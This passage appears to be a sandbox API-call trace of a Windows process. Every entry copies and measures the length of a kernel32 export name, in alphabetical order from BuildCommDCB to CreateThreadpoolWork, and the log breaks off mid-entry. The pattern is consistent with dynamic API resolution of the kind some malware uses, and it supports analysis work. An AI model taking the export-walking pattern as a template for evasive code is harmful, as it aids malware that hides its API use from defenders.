lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.600] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.600] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.601] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.601] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.601] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.601] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.601] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.601] lstrlenA (lpString="CANCELIO") returned 8 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.601] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.601] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.601] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.601] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.601] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.601] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.601] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.601] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.601] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.601] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.601] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.601] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.601] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.602] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.602] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.602] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.602] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.602] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.602] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.602] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.602] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.602] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.602] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.602] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.602] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.602] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.602] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.603] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.603] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.603] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.603] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.603] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.603] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.603] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.603] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.603] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.603] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.603] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.603] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.603] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.603] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.603] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.603] lstrlenA (lpString="COPYFILEA") returned 9 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.603] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.603] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.603] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.604] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.604] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.604] lstrlenA (lpString="COPYFILEW") returned 9 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.604] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.604] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.604] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.604] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.604] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.604] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.604] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.604] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.604] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.604] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.604] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.604] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.604] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.604] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.604] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.604] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.605] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.605] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.605] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.605] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.605] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.605] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.605] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.605] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.605] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.605] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.605] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.605] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.605] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.605] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.605] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.605] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.605] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.605] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.605] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.606] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.606] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.606] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.606] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.606] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.606] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.606] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.606] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.606] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.606] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.606] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.606] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.606] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.606] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.606] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.606] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.606] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.606] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.606] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.607] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.607] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.607] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.607] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.607] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.607] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.607] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.607] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.607] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.607] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.607] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.607] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.607] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.607] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.607] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.607] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.607] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.607] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.607] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.607] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" 